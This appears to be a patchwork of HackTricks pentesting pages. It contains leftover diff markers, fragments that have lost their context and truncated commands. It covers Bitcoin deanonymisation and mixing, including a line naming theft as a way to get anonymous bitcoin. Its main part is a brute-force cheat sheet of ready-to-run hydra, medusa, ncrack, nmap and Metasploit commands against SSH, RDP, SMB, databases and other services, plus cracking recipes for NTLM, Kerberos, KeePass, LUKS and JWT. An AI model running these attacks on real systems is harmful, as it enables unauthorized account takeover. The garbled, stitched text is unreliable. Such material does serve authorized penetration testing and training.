Also called the "optimal change heuristic". Consider this bitcoin transaction. It has two inputs worth 2 BTC and 3 BTC and two outputs worth 4 BTC and 1 BTC.
@@ -148,7 +146,7 @@ This is an issue for transactions which have more than one input. One way to fix

5 btc
```
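One way to make the heuristic concrete (a sketch under the simplifying assumption of zero fees; real analysis must also account for fees and multiple change outputs):

```python
def likely_change(inputs, outputs):
    """An output is probably NOT the payment if the wallet could have paid it
    while dropping one of the inputs - wallets avoid unnecessary inputs."""
    total_in = sum(inputs)
    change = []
    for candidate_payment in outputs:
        # could the wallet have removed some input and still covered this output?
        if any(total_in - inp >= candidate_payment for inp in inputs):
            change.append(candidate_payment)   # then an input was unnecessary
    return change

# the transaction above: inputs of 2 and 3 BTC, outputs of 4 and 1 BTC
assert likely_change([2, 3], [4, 1]) == [1]    # 1 BTC is flagged as the change
```

Paying 1 BTC would have needed only one of the two inputs, so the 4 BTC output is the presumed payment and 1 BTC the change.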
## Forced address reuse

**Forced address reuse** or **incentivized address reuse** is when an adversary pays an (often small) amount of bitcoin to addresses that have already been used on the block chain. The adversary hopes that users or their wallet software **will use the payments as inputs to a larger transaction which will reveal other addresses via the common-input-ownership** heuristic. These payments can be understood as a way to coerce the address owner into unintentional address reuse.

@@ -156,14 +154,14 @@ This attack is sometimes incorrectly called a **dust attack**.

The correct behaviour by wallets is to not spend coins that have landed on already-used empty addresses.
## Other Blockchain Analysis

* **Exact Payment Amounts**: In order to avoid transactions with change, the payment needs to be equal to the UTXO (which is highly unexpected). Therefore, a **transaction with no change address is probably a transfer between 2 addresses of the same user**.
* **Round Numbers**: In a transaction, if one of the outputs is a "**round number**", it's highly probable that this is a **payment to a human that set that** "round number" **price**, so the other part must be the leftover.
* **Wallet fingerprinting:** A careful analyst can sometimes deduce which software created a certain transaction, because **different wallet software doesn't always create transactions in exactly the same way**. Wallet fingerprinting can be used to detect change outputs because a change output is the one spent with the same wallet fingerprint.
* **Amount & Timing correlations**: If the person that performed the transaction **discloses** the **time** and/or **amount** of the transaction, it can be easily **discoverable**.
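The round-number signal from the list above, as a small sketch (amounts in satoshis; the "round" base unit is an assumption an analyst would tune):

```python
def split_payment_and_change(outputs, base=100_000):
    """For a 2-output transaction, guess that the round amount is the
    human-typed payment and the ragged one is the change.
    Returns (payment, change), or None when the heuristic is inconclusive."""
    a, b = outputs
    if a % base == 0 and b % base != 0:
        return a, b
    if b % base == 0 and a % base != 0:
        return b, a
    return None

# 0.05 BTC exactly (round) vs 0.02731405 BTC (ragged leftover), in satoshis
assert split_payment_and_change([5_000_000, 2_731_405]) == (5_000_000, 2_731_405)
assert split_payment_and_change([5_000_000, 2_000_000]) is None   # both round
```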
## Traffic analysis

Some organisation **sniffing your traffic** can see you communicating in the bitcoin network.\
If the adversary sees a transaction or block **coming out of your node which did not previously enter**, then it can know with near-certainty that **the transaction was made by you or the block was mined by you**. As internet connections are involved, the adversary will be able to **link the IP address with the discovered bitcoin information**.

@@ -171,27 +169,27 @@ If the adversary sees a transaction or block **coming out of your node which did

An attacker that isn't able to sniff all the Internet traffic but that has **a lot of Bitcoin nodes** in order to stay **closer** to the **sources** could be able to learn the IP addresses that are announcing transactions or blocks.\
Also, some wallets periodically rebroadcast their unconfirmed transactions so that they are more likely to propagate widely through the network and be mined.
## Other attacks to find info about the owner of addresses

For more attacks read [https://en.bitcoin.it/wiki/Privacy](https://en.bitcoin.it/wiki/Privacy)
# Anonymous Bitcoins

## Obtaining Bitcoins Anonymously

* **Cash trades:** Buy bitcoin using cash.
* **Cash substitute:** Buy gift cards or similar and exchange them for bitcoin online.
* **Mining:** Mining is the most anonymous way to obtain bitcoin. This applies to solo-mining, as [mining pools](https://en.bitcoin.it/wiki/Pooled\_mining) generally know the hasher's IP address.
* **Stealing:** In theory, another way of obtaining anonymous bitcoin is to steal it.
## Mixers

A user would **send bitcoins to a mixing service** and the service would **send different bitcoins back to the user**, minus a fee. In theory an adversary observing the blockchain would be **unable to link** the incoming and outgoing transactions.

However, the user needs to trust the mixing service to return the bitcoin and also not to be keeping logs about the relations between the money received and sent.\
Some other services can also be used as mixers, like Bitcoin casinos where you can send bitcoins and retrieve them later.
## CoinJoin

**CoinJoin** will **mix several transactions of different users into just one** in order to make it more **difficult** for an observer to find out **which input is related to which output**.\
This offers a new level of privacy; however, **some** **transactions** where some input and output amounts are correlated or are very different from the rest of the inputs and outputs **can still be correlated** by the external observer.
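A toy illustration of why equal-valued CoinJoin outputs resist linking (participants and amounts below are hypothetical): every one-to-one assignment of contributors to outputs is consistent with what an on-chain observer sees.

```python
from itertools import permutations

# Hypothetical CoinJoin: three users each contribute 0.1 BTC and each
# receives back one equal-valued 0.1 BTC output.
contributors = ["alice", "bob", "carol"]
outputs = ["out1", "out2", "out3"]  # all worth exactly 0.1 BTC

# Because the outputs are indistinguishable by amount, every bijection
# contributor -> output is equally plausible to the observer.
plausible = [dict(zip(contributors, p)) for p in permutations(outputs)]
print(len(plausible))  # 3! = 6 equally plausible mappings
```

This is also why unequal amounts weaken the scheme: a unique output value collapses the set of plausible mappings back towards one.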
Examples of (likely) CoinJoin transaction IDs on bitcoin's blockchain are `402d…`
[**https://coinjoin.io/en**](https://coinjoin.io/en)\
**Similar to CoinJoin but better, for Ethereum you have** [**Tornado Cash**](https://tornado.cash) **(the money is given by miners, so it just appears in your wallet).**
## PayJoin

The type of CoinJoin discussed in the previous section can be easily identified as such by checking for the multiple outputs with the same value.

It could be interpreted as a simple transaction paying to somewhere with leftover change.

If PayJoin transactions became even moderately used then it would make the **common-input-ownership heuristic completely flawed in practice**. As they are undetectable we wouldn't even know whether they are being used today. As transaction surveillance companies mostly depend on that heuristic, as of 2019 there is great excitement about the PayJoin idea.
# Bitcoin Privacy Good Practices

## Wallet Synchronization

Bitcoin wallets must somehow obtain information about their balance and history. As of late-2018 the most practical and private existing solutions are to use a **full node wallet** (which is maximally private) and **client-side block filtering** (which is very good).

* **Full node:** Full nodes download the entire blockchain, which contains every on-chain [transaction](https://en.bitcoin.it/wiki/Transaction) that has ever happened in bitcoin. So an adversary watching the user's internet connection will not be able to learn which transactions or addresses the user is interested in.
* **Client-side block filtering:** Client-side block filtering works by having **filters** created that contain all the **addresses** for every transaction in a block. The filters can test whether an **element is in the set**; false positives are possible but not false negatives. A lightweight wallet would **download** all the filters for every **block** in the **blockchain** and check for matches with its **own** **addresses**. Blocks which contain matches would be downloaded in full from the peer-to-peer network, and those blocks would be used to obtain the wallet's history and current balance.
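The "false positives possible, never false negatives" set test can be sketched with a Bloom-style filter (real client-side filtering, BIP 158, uses Golomb-coded sets instead; class and address names here are made up):

```python
import hashlib

class BlockFilterSketch:
    """Bloom-style membership test: may say yes wrongly, never says no wrongly."""

    def __init__(self, size_bits=1024, num_hashes=3):
        self.size = size_bits
        self.num_hashes = num_hashes
        self.bits = 0  # bit array packed into one int

    def _positions(self, item: str):
        # Derive num_hashes bit positions from independent SHA-256 digests.
        for i in range(self.num_hashes):
            digest = hashlib.sha256(f"{i}:{item}".encode()).digest()
            yield int.from_bytes(digest[:4], "big") % self.size

    def add(self, item: str):
        for pos in self._positions(item):
            self.bits |= 1 << pos

    def might_contain(self, item: str) -> bool:
        return all(self.bits >> pos & 1 for pos in self._positions(item))

# The wallet downloads only this tiny filter, not the block itself.
f = BlockFilterSketch()
f.add("addr-in-block")  # hypothetical address appearing in a block
print(f.might_contain("addr-in-block"))  # True -> fetch the full block
```

Occasional false positives are actually good for privacy: the peer serving blocks cannot tell whether a downloaded block really contained one of the wallet's addresses.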
## Tor

The Bitcoin network uses a peer-to-peer protocol, which means that other peers can learn your IP address. This is why it's recommended to **connect through Tor every time you want to interact with the bitcoin network**.
## Avoiding address reuse

**Addresses being used more than once is very damaging to privacy because that links together more blockchain transactions with proof that they were created by the same entity**. The most private and secure way to use bitcoin is to send a brand **new address to each person who pays you**. After the received coins have been spent the address should never be used again. Also, a brand new bitcoin address should be demanded when sending bitcoin. All good bitcoin wallets have a user interface which discourages address reuse.
## Multiple transactions

**Paying** someone with **more than one on-chain transaction** can greatly reduce the power of amount-based privacy attacks such as amount correlation and round numbers. For example, if the user wants to pay 5 BTC to somebody and they don't want the 5 BTC value to be easily searched for, then they can send two transactions for the value of 2 BTC and 3 BTC which together add up to 5 BTC.
## Change avoidance

Change avoidance is where transaction inputs and outputs are carefully chosen to not require a change output at all. **Not having a change output is excellent for privacy**, as it breaks change detection heuristics.
## Multiple change outputs

If change avoidance is not an option then **creating more than one change output can improve privacy**. This also breaks change detection heuristics, which usually assume there is only a single change output. As this method uses more block space than usual, change avoidance is preferable.
# Monero

When Monero was developed, the gaping need for **complete anonymity** was what it sought to resolve, and to a large extent, it has filled that void.
# Ethereum

## Gas

Gas refers to the unit that measures the **amount** of **computational** **effort** required to execute specific operations on the Ethereum network. Gas also refers to the **fee** required to successfully conduct a **transaction** on Ethereum.
Additionally, Jordan can also set a max fee (`maxFeePerGas`) for the transaction.

As the base fee is calculated by the network based on demand for block space, this last parameter (`maxFeePerGas`) helps to control the maximum fee that is going to be paid.
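The resulting fee can be sketched with the EIP-1559 rule (all prices below are hypothetical, in gwei): the effective gas price is the base fee plus whatever tip still fits under `maxFeePerGas`.

```python
def effective_gas_price(base_fee: int, max_priority_fee: int, max_fee: int) -> int:
    """EIP-1559: the tip actually paid is capped so that
    base fee + tip never exceeds maxFeePerGas."""
    priority = min(max_priority_fee, max_fee - base_fee)
    return base_fee + priority

gas_used = 21_000  # gas consumed by a plain ETH transfer
# Hypothetical prices in gwei:
price = effective_gas_price(base_fee=100, max_priority_fee=2, max_fee=110)
print(price)             # 102 gwei per unit of gas
print(gas_used * price)  # 2142000 gwei total fee
```

If the base fee rises so that `base_fee + max_priority_fee` would exceed `maxFeePerGas`, the tip is squeezed first; if the base fee alone exceeds the cap, the transaction simply waits.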
## Transactions

Notice that in the **Ethereum** network a transaction is performed between 2 addresses and these can be **user or smart contract addresses**.\
**Smart Contracts** are stored in the distributed ledger via a **special** **transaction**.
Note that there isn't any field for the origin address; this is because it can be derived from the signature.
# References

* [https://en.wikipedia.org/wiki/Proof\_of\_stake](https://en.wikipedia.org/wiki/Proof\_of\_stake)
* [https://www.mycryptopedia.com/public-key-private-key-explained/](https://www.mycryptopedia.com/public-key-private-key-explained/)
</details>
# Page 1
<details>
</details>
# Brute Force - CheatSheet
{% hint style="warning" %}
**Support HackTricks and get benefits!**
**Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
{% endhint %}
# Default Credentials

**Search in google** for default credentials of the technology that is being used, or **try these links**:
* [**http://www.passwordsdatabase.com/**](http://www.passwordsdatabase.com)
* [**https://many-passwords.github.io/**](https://many-passwords.github.io)
# **Create your own Dictionaries**

Find as much information about the target as you can and generate a custom dictionary. Tools that may help:
## Crunch

```bash
crunch 4 6 0123456789ABCDEF -o crunch1.txt #From length 4 to 6 using that alphabet
crunch 4 4 -f /usr/share/crunch/charset.lst mixalpha # Only length 4 using chars
crunch 6 8 -t ,@@^^%%
```
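What crunch does for a plain min/max-length run can be sketched with `itertools` (the alphabet and lengths below are arbitrary toy values):

```python
import itertools

def candidates(alphabet: str, min_len: int, max_len: int):
    """Yield every string over `alphabet` from min_len to max_len characters,
    like `crunch <min> <max> <alphabet>`."""
    for length in range(min_len, max_len + 1):
        for combo in itertools.product(alphabet, repeat=length):
            yield "".join(combo)

print(list(candidates("01", 1, 2)))  # ['0', '1', '00', '01', '10', '11']
```

The candidate count grows as the sum of `len(alphabet)**n` over the length range, which is why tightening the alphabet or pattern (as crunch's `-t` placeholders do) matters far more than raw speed.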
## Cewl

```bash
cewl example.com -m 5 -w words.txt
```
## [CUPP](https://github.com/Mebus/cupp)

Generate passwords based on your knowledge of the victim (names, dates...)

```bash
python3 cupp.py -h
```
## [pydictor](https://github.com/LandGrey/pydictor)

## Wordlists

* [**https://github.com/danielmiessler/SecLists**](https://github.com/danielmiessler/SecLists)
* [**https://github.com/Dormidera/WordList-Compendium**](https://github.com/Dormidera/WordList-Compendium)
* [**https://github.com/google/fuzzing/tree/master/dictionaries**](https://github.com/carlospolop/hacktricks/tree/95b16dc7eb952272459fc877e4c9d0777d746a16/google/fuzzing/tree/master/dictionaries/README.md)
* [**https://crackstation.net/crackstation-wordlist-password-cracking-dictionary.htm**](https://crackstation.net/crackstation-wordlist-password-cracking-dictionary.htm)
# Services

Ordered alphabetically by service name.

## AFP
```bash
nmap -p 548 --script afp-brute <IP>
msf> set USER_FILE <PATH_USERS>
msf> run
```
## AJP

```bash
nmap --script ajp-brute -p 8009 <IP>
```
## Cassandra

```bash
nmap --script cassandra-brute -p 9160 <IP>
```
## CouchDB

```bash
msf> use auxiliary/scanner/couchdb/couchdb_login
hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst localhost -s 5984 http-get /
```
## Docker Registry

```
hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst 10.10.10.10 -s 5000 https-get /v2/
```
## Elasticsearch

```
hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst localhost -s 9200 http-get /
```
## FTP

```bash
hydra -l root -P passwords.txt [-t 32] <IP> ftp
ncrack -p 21 --user root -P passwords.txt <IP> [-T 5]
medusa -u root -P 500-worst-passwords.txt -h <IP> -M ftp
```
## HTTP Generic Brute

### [**WFuzz**](pentesting-web/web-tool-wfuzz.md)

## HTTP Basic Auth
```bash
hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst sizzle.htb.local http-get /certsrv/
medusa -h <IP> -u <username> -P <passwords.txt> -M http -m DIR:/path/to/auth -T 10
```
## HTTP - Post Form

```bash
hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst domain.htb http-post-form "/path/index.php:name=^USER^&password=^PASS^&enter=Sign+in:Login name or password is incorrect" -V
```

For http**s** you have to change from "http-post-form" to "**https-post-form**"
## **HTTP - CMS --** (W)ordpress, (J)oomla or (D)rupal or (M)oodle

```bash
cmsmap -f W/J/D/M -u a -p a https://wordpress.com
```
## IMAP

```bash
hydra -l USERNAME -P /path/to/passwords.txt -f <IP> imap -V
hydra -S -v -l USERNAME -P /path/to/passwords.txt -s 993 -f <IP> imap -V
nmap -sV --script imap-brute -p <PORT> <IP>
```
## IRC

```bash
nmap -sV --script irc-brute,irc-sasl-brute --script-args userdb=/path/users.txt,passdb=/path/pass.txt -p <PORT> <IP>
```
## ISCSI

```bash
nmap -sV --script iscsi-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 3260 <IP>
```
## JWT

```bash
#hashcat
python3 jwt-cracker.py -jwt eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1w
jwt-cracker "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWV9.TJVA95OrM7E2cBab30RMHrHDcEfxjoYZgeFONFh7HgQ" "abcdefghijklmnopqrstuwxyz" 6
```
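The idea behind these HS256 crackers can be sketched with the standard library alone: re-sign the header and payload with candidate keys until the signature matches. The demo token and the weak secret `ab` below are made up for illustration.

```python
import base64, hashlib, hmac, itertools, string

def b64url(data: bytes) -> str:
    # JWT uses unpadded URL-safe base64.
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

def crack_hs256(token: str, alphabet: str, max_len: int):
    """Try every key up to max_len chars until the HMAC-SHA256 signature matches."""
    signing_input, _, signature = token.rpartition(".")
    for length in range(1, max_len + 1):
        for cand in itertools.product(alphabet, repeat=length):
            key = "".join(cand).encode()
            mac = hmac.new(key, signing_input.encode(), hashlib.sha256).digest()
            if b64url(mac) == signature:
                return key.decode()
    return None

# Build a demo token signed with the weak secret "ab", then recover it.
header = b64url(b'{"alg":"HS256","typ":"JWT"}')
payload = b64url(b'{"user":"admin"}')
signing_input = f"{header}.{payload}"
sig = b64url(hmac.new(b"ab", signing_input.encode(), hashlib.sha256).digest())
print(crack_hs256(f"{signing_input}.{sig}", string.ascii_lowercase, 2))  # ab
```

Real tools work the same way but add rule-based mutation and GPU acceleration (hashcat mode 16500); the feasibility depends entirely on the secret's entropy.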
## LDAP

```bash
nmap --script ldap-brute -p 389 <IP>
```
## MQTT

```
ncrack mqtt://127.0.0.1 --user test -P /root/Desktop/pass.txt -v
```
## Mongo

```bash
nmap -sV --script mongodb-brute -n -p 27017 <IP>
use auxiliary/scanner/mongodb/mongodb_login
```
## MySQL

```bash
# hydra
msf> use auxiliary/scanner/mysql/mysql_login; set VERBOSE false
medusa -h <IP/Host> -u <username> -P <password_list> <-f | to stop medusa on first success attempt> -t <threads> -M mysql
```
## OracleSQL

```bash
patator oracle_login sid=<SID> host=<IP> user=FILE0 password=FILE1 0=users-oracle.txt 1=pass-oracle.txt -x ignore:code=ORA-01017
pip3 install cx_Oracle --upgrade
nmap -p1521 --script oracle-brute-stealth --script-args oracle-brute-stealth.sid=DB11g -n 10.11.21.30
```
## POP

```bash
hydra -l USERNAME -P /path/to/passwords.txt -f <IP> pop3 -V
hydra -S -v -l USERNAME -P /path/to/passwords.txt -s 995 -f <IP> pop3 -V
```
## PostgreSQL

```bash
hydra -L /root/Desktop/user.txt -P /root/Desktop/pass.txt <IP> postgres
use auxiliary/scanner/postgres/postgres_login
nmap -sV --script pgsql-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 5432 <IP>
```
## PPTP

You can download the `.deb` package to install from [https://http.kali.org/pool/main/t/thc-pptp-bruter/](https://http.kali.org/pool/main/t/thc-pptp-bruter/)

```bash
sudo dpkg -i thc-pptp-bruter*.deb #Install the package
cat rockyou.txt | thc-pptp-bruter -u <Username> <IP>
```
## RDP

```bash
ncrack -vv --user <User> -P pwds.txt rdp://<IP>
hydra -V -f -L <userslist> -P <passwlist> rdp://<IP>
```
## Redis

```bash
msf> use auxiliary/scanner/redis/redis_login
nmap --script redis-brute -p 6379 <IP>
hydra -P /path/pass.txt redis://<IP>:<PORT> # 6379 is the default
```
## Rexec

```bash
hydra -l <username> -P <password_file> rexec://<Victim-IP> -v -V
```
## Rlogin

```bash
hydra -l <username> -P <password_file> rlogin://<Victim-IP> -v -V
```
## Rsh

```bash
hydra -L <Username_list> rsh://<Victim_IP> -v -V
```

[http://pentestmonkey.net/tools/misc/rsh-grind](http://pentestmonkey.net/tools/misc/rsh-grind)
## Rsync

```bash
nmap -sV --script rsync-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 873 <IP>
```
## RTSP

```bash
hydra -l root -P passwords.txt <IP> rtsp
```
## SNMP

```bash
msf> use auxiliary/scanner/snmp/snmp_login
onesixtyone -c /usr/share/metasploit-framework/data/wordlists/snmp_default_pass.
hydra -P /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt target.com snmp
```
## SMB

```bash
nmap --script smb-brute -p 445 <IP>
hydra -l Administrator -P words.txt 192.168.1.12 smb -t 1
```
## SMTP

```bash
hydra -l <username> -P /path/to/passwords.txt <IP> smtp -V
hydra -l <username> -P /path/to/passwords.txt -s 587 <IP> -S -v -V #Port 587 for SMTP with SSL
```
## SOCKS

```bash
nmap -vvv -sCV --script socks-brute --script-args userdb=users.txt,passdb=/usr/share/seclists/Passwords/xato-net-10-million-passwords-1000000.txt,unpwndb.timelimit=30m -p 1080 <IP>
```
## SQL Server

```bash
#Use the NetBIOS name of the machine as domain
nmap -p 1433 --script ms-sql-brute --script-args mssql.domain=DOMAIN,userdb=cust
msf> use auxiliary/scanner/mssql/mssql_login #Be careful, you can block accounts. If you have a domain set it and use USE_WINDOWS_AUTHENT
```
## SSH

```bash
hydra -l root -P passwords.txt [-t 32] <IP> ssh
medusa -u root -P 500-worst-passwords.txt -h <IP> -M ssh
patator ssh_login host=<ip> port=22 user=root 0=/path/passwords.txt password=FILE0 -x ignore:mesg='Authentication failed'
```
## Telnet

```bash
hydra -l root -P passwords.txt [-t 32] <IP> telnet
ncrack -p 23 --user root -P passwords.txt <IP> [-T 5]
medusa -u root -P 500-worst-passwords.txt -h <IP> -M telnet
```
## VNC

```bash
hydra -L /root/Desktop/user.txt -P /root/Desktop/pass.txt -s <PORT> <IP> vnc
set RHOSTS <ip>
set PASS_FILE /usr/share/metasploit-framework/data/wordlists/passwords.lst
```
## Winrm

```bash
crackmapexec winrm <IP> -d <Domain Name> -u usernames.txt -p passwords.txt
```
# Local

## Online cracking databases

* [~~http://hashtoolkit.com/reverse-hash?~~](http://hashtoolkit.com/reverse-hash?) (MD5 & SHA1)
* [https://www.onlinehashcrack.com/](https://www.onlinehashcrack.com) (Hashes, WPA2 captures, and archives MSOffice, ZIP, PDF...)
Check these out before trying to brute-force a hash.
## ZIP

```bash
#sudo apt-get install fcrackzip
hashcat.exe -m 13600 -a 0 .\hashzip.txt .\wordlists\rockyou.txt
.\hashcat.exe -m 13600 -i -a 0 .\hashzip.txt #Incremental attack
```
## 7z

```bash
cat /usr/share/wordlists/rockyou.txt | 7za t backup.7z
apt-get install libcompress-raw-lzma-perl
./7z2john.pl file.7z > 7zhash.john
```
## PDF

```bash
apt-get install pdfcrack
sudo apt-get install qpdf
qpdf --password=<PASSWORD> --decrypt encrypted.pdf plaintext.pdf
```
## JWT

```bash
git clone https://github.com/Sjord/jwtcrack.git
python jwt2john.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5h
john jwt.john #It does not work with Kali-John
```
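Besides jwtcrack/john, an HS256 token can be brute-forced directly, since its signature is just `HMAC-SHA256(secret, b64(header) + "." + b64(payload))`. A self-contained sketch (the token and candidate secrets below are fabricated for the example):

```python
import base64, hashlib, hmac, json

def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

def crack_hs256(token, candidates):
    """Re-sign the header.payload with each candidate secret and compare."""
    signing_input, _, sig = token.rpartition(".")
    sig_bytes = base64.urlsafe_b64decode(sig + "=" * (-len(sig) % 4))
    for secret in candidates:
        mac = hmac.new(secret.encode(), signing_input.encode(), hashlib.sha256).digest()
        if hmac.compare_digest(mac, sig_bytes):
            return secret
    return None

# Forge a demo token signed with "s3cr3t", then recover the secret
header = b64url(json.dumps({"alg": "HS256", "typ": "JWT"}).encode())
payload = b64url(json.dumps({"user": "admin"}).encode())
sig = b64url(hmac.new(b"s3cr3t", f"{header}.{payload}".encode(), hashlib.sha256).digest())
token = f"{header}.{payload}.{sig}"
print(crack_hs256(token, ["password", "s3cr3t"]))  # → s3cr3t
```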
## NTLM cracking

```bash
Format:USER:ID:LM_HASH:NT_HASH:::
john --wordlist=/usr/share/wordlists/rockyou.txt --format=NT file_NTLM.hashes
hashcat -a 0 -m 1000 --username file_NTLM.hashes /usr/share/wordlists/rockyou.txt --potfile-path salida_NT.pot
```
## Keepass

```bash
sudo apt-get install -y kpcli #Install keepass tools like keepass2john
keepass2john -k <file-password> file.kdbx > hash #Use -k if the keepass also uses a key file as a credential
john --wordlist=/usr/share/wordlists/rockyou.txt hash
```
## Kerberoasting

```bash
john --format=krb5tgs --wordlist=passwords_kerb.txt hashes.kerberoast
hashcat -m 13100 --force -a 0 hashes.kerberoast passwords_kerb.txt
./tgsrepcrack.py wordlist.txt 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi
```
## LUKS image

### Method 1

Install: [https://github.com/glv2/bruteforce-luks](https://github.com/glv2/bruteforce-luks)

```bash
ls /dev/mapper/ #You should find here the image mylucksopen
mount /dev/mapper/mylucksopen /mnt
```
### Method 2

```bash
cryptsetup luksDump backup.img #Check that the payload offset is set to 4096
mount /dev/mapper/mylucksopen /mnt
```

Another LUKS BF tutorial: [http://blog.dclabs.com.br/2020/03/bruteforcing-linux-disk-encription-luks.html?m=1](http://blog.dclabs.com.br/2020/03/bruteforcing-linux-disk-encription-luks.html?m=1)
## MySQL

```bash
#John hash format
dbuser:$mysqlna$112233445566778899aabbccddeeff1122334455*73def07da6fba5dcc1b19c918dbd998e0d1f3f9d
```
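The `$mysqlna$` entry above is a sniffed challenge/response; older `PASSWORD()`-style MySQL hashes (the `*`-prefixed kind, mode 300 in hashcat) are simply `SHA1(SHA1(password))` and can be checked directly — a sketch:

```python
import hashlib

def mysql_native_hash(password):
    """MySQL PASSWORD()-style hash: '*' + hex(SHA1(SHA1(password)))."""
    inner = hashlib.sha1(password.encode()).digest()
    return "*" + hashlib.sha1(inner).hexdigest().upper()

def crack_mysql_hash(target, wordlist):
    return next((w for w in wordlist if mysql_native_hash(w) == target), None)

print(mysql_native_hash("password"))  # → *2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19
```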
## PGP/GPG Private key

```bash
gpg2john private_pgp.key #This will generate the hash, save it in a file
john --wordlist=/usr/share/wordlists/rockyou.txt ./hash
```
## Open Office Password-Protected Column

If you have an xlsx file with a column protected by a password, you can unprotect it:

```bash
zip -r file.xls .
```
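The manual unzip/edit/rezip dance can also be scripted; a sketch that strips the `<sheetProtection .../>` element from every worksheet (real workbooks may additionally carry `workbookProtection` in `xl/workbook.xml`, which this does not touch):

```python
import re
import zipfile

def unprotect_xlsx(src_path, dst_path):
    """Copy an xlsx, removing <sheetProtection .../> from every worksheet."""
    with zipfile.ZipFile(src_path) as src, zipfile.ZipFile(dst_path, "w") as dst:
        for item in src.infolist():
            data = src.read(item.filename)
            if item.filename.startswith("xl/worksheets/"):
                data = re.sub(rb"<sheetProtection[^>]*/?>", b"", data)
            dst.writestr(item, data)
```

An xlsx is just a zip of XML files, so removing the protection element is enough — the "password" is only a hash Excel checks client-side.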
## PFX Certificates

```bash
# From https://github.com/Ridter/p12tool
crackpkcs12 -d /usr/share/wordlists/rockyou.txt ./cert.pfx
```
# Tools

**Hash examples:** [https://openwall.info/wiki/john/sample-hashes](https://openwall.info/wiki/john/sample-hashes)

## Hash-identifier

```bash
hash-identifier
> <HASH>
```
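If `hash-identifier` isn't at hand, a crude first guess can be made from length and prefix alone — a toy heuristic, nowhere near the real tool's coverage:

```python
import re

# Guess a hash type from the length/charset of a hex digest or a crypt prefix
HEX_LENGTHS = {32: "MD5 (or NTLM)", 40: "SHA-1", 56: "SHA-224",
               64: "SHA-256", 96: "SHA-384", 128: "SHA-512"}

def guess_hash_type(h):
    h = h.strip()
    if re.fullmatch(r"[0-9a-fA-F]+", h) and len(h) in HEX_LENGTHS:
        return HEX_LENGTHS[len(h)]
    if h.startswith("$2a$") or h.startswith("$2b$"):
        return "bcrypt"
    if h.startswith("$6$"):
        return "sha512crypt"
    return "unknown"

print(guess_hash_type("8846f7eaee8fb117ad06bdd830b7586c"))  # → MD5 (or NTLM)
```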
## John mutation

Read _**/etc/john/john.conf**_ and configure it

```bash
john --wordlist=words.txt --rules --stdout > w_mutated.txt
john --wordlist=words.txt --rules=all --stdout > w_mutated.txt #Apply all rules
```
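The rule engine can also be imitated in a few lines when you just need quick mutations of a known base word — a hand-rolled sketch covering capitalization, leetspeak, reversal, and common suffixes:

```python
def mutate(word):
    """Generate john/hashcat-style mutations of a base word (tiny rule set)."""
    leet = str.maketrans("aeios", "43105")
    candidates = {word, word.capitalize(), word.upper(),
                  word.translate(leet), word[::-1]}
    for base in list(candidates):
        for suffix in ("1", "123", "!", "2023"):
            candidates.add(base + suffix)
    return sorted(candidates)

for candidate in mutate("password")[:8]:
    print(candidate)
```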
## Hashcat

```bash
hashcat --example-hashes | grep -B1 -A2 "NTLM"
```

Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
# Basic Payloads

* **Simple List:** Just a list containing an entry in each line
* **Runtime File:** A list read at runtime (not loaded in memory). For supporting big lists.

# What is a Certificate
In cryptography, a **public key certificate,** also known as a **digital certificate** or **identity certificate,** is an electronic document used to prove the ownership of a public key. The certificate includes information about the key, information about the identity of its owner \(called the subject\), and the digital signature of an entity that has verified the certificate's contents \(called the issuer\). If the signature is valid, and the software examining the certificate trusts the issuer, then it can use that key to communicate securely with the certificate's subject.

The most common format for public key certificates is defined by [X.509](https://en.wikipedia.org/wiki/X.509). Because X.509 is very general, the format is further constrained by profiles defined for certain use cases, such as [Public Key Infrastructure \(X.509\)](https://en.wikipedia.org/wiki/PKIX) as defined in RFC 5280.
# x509 Common Fields

* **Version Number:** Version of x509 format.
* **Serial Number**: Used to uniquely identify the certificate within a CA's systems. In particular this is used to track revocation information.
* Address of the **OCSP responder from where revocation of this certificate** can be checked \(OCSP access method\).
* **CRL Distribution Points**: This extension identifies the location of the CRL from which the revocation of this certificate can be checked. The application that processes the certificate can get the location of the CRL from this extension, download the CRL and then check the revocation of this certificate.
## Difference between OCSP and CRL Distribution Points

**OCSP** \(RFC 2560\) is a standard protocol that consists of an **OCSP client and an OCSP responder**. This protocol **determines revocation status of a given digital public-key certificate** **without** having to **download** the **entire CRL**.

**CRL** is the **traditional method** of checking certificate validity. A **CRL provides a list of certificate serial numbers** that have been revoked or are no longer valid. CRLs let the verifier check the revocation status of the presented certificate while verifying it. CRLs are limited to 512 entries.

# Basic Information
[**Apache Airflow**](https://airflow.apache.org) is used for the **scheduling and orchestration of data pipelines or workflows**. Orchestration of data pipelines refers to the sequencing, coordination, scheduling, and managing of complex **data pipelines from diverse sources**. These data pipelines deliver data sets ready for consumption by business intelligence applications, data science, and machine learning models that support big data applications.

Basically, Apache Airflow allows you to **schedule the execution of code when something** (event, cron) **happens**.
# Local Lab

## Docker-Compose

